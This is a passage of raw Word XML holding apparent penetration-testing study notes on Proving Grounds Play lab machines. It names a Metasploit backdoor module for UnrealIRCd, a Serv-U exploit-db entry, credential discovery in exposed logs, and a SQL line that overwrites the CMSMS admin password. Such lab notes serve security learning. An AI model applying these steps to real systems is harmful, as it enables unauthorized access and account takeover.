        <w:t xml:space="preserve">Antivirus scan and CHKROOTKIT </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003813">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003814">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SunsetDecoy PG Play seemed to have many different ways to get privilege escalation. In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1198">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version of the walkthrough, they used the antivirus scan capability. And then in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1199">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version of the walkthrough, they used CHKROOTKIT. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003815">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003816">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But one thing they both had in common is that they both used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a tool that monitors processes running on the system without requiring root access. It shows scheduled tasks, cron jobs, and processes triggered by system activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003817">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003818">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003819">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ebugqzu58nef" w:id="518"/>
      <w:bookmarkEnd w:id="518"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Irc unreal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1200">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetNoontide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, found irc (Internet Relay Chat); IRC protocol is an application layer protocol that facilitates text-based chat system for instant messaging. IRC is designed for group communication in discussion forums ,works on client/server model</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was found on these ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6667</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6697</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000381F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8067</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003820">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IRC Unreal (Unreal is the version of IRC) is vulnerable, so we just used the Metasploit exploit "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003821">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_egb4chseuodz" w:id="519"/>
      <w:bookmarkEnd w:id="519"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Morse Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003822">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003823">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1201">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Vegeta1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we got morse code in the format of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.wav</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. You can use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1202">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to translate/decode Morse Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003824">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1203">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://morsecode.world/international/decoder/audio-decoder-adaptive.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003825">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cjf5m1ef3ld0" w:id="520"/>
      <w:bookmarkEnd w:id="520"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eLection website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003826">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003827">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information about this website can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId1204">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it's a website made by Tripath Project. And it was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1205">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">election1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003828">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003829">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this specific box, we went to Settings &gt; System Info &gt; Logging &gt; View Logs. And then in the logs section we saw credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, in another writeup, it seems there was an even easier way to obtain the logs. The website was on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/election/admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and if you did further ffuf, you would have found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/election/admin/logs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system.log </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file reveals the same info, so no need to get into the eLection GUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g97gh1egp4oi" w:id="521"/>
      <w:bookmarkEnd w:id="521"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Serv-U FTP Server (CVE-2019–12181)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000382F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003830">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1206">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">election1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play exploited this via this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1207">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exploitdb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1325"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1208">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/47173</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832">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003833">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003834">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sd3sms3mji29" w:id="522"/>
      <w:bookmarkEnd w:id="522"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CMSMS (CMS Made Simple)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003835">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1209">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had to exploit CMSMS. We got into the MySQL database, where we found an admin user and an MD5 hash but it was uncrackable. So we tried adding a new user, but that didn't work (you can see how we did that in the MySQL section).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003836">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003837">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, what ended up being the solution was resetting the Admin password. This attack vector came from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1210">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source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1211">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cmscanbesimple.org/blog/cms-made-simple-admin-password-recovery</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003839">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'admin'))) where username = 'admin';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from cms_users;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000383C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="602"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
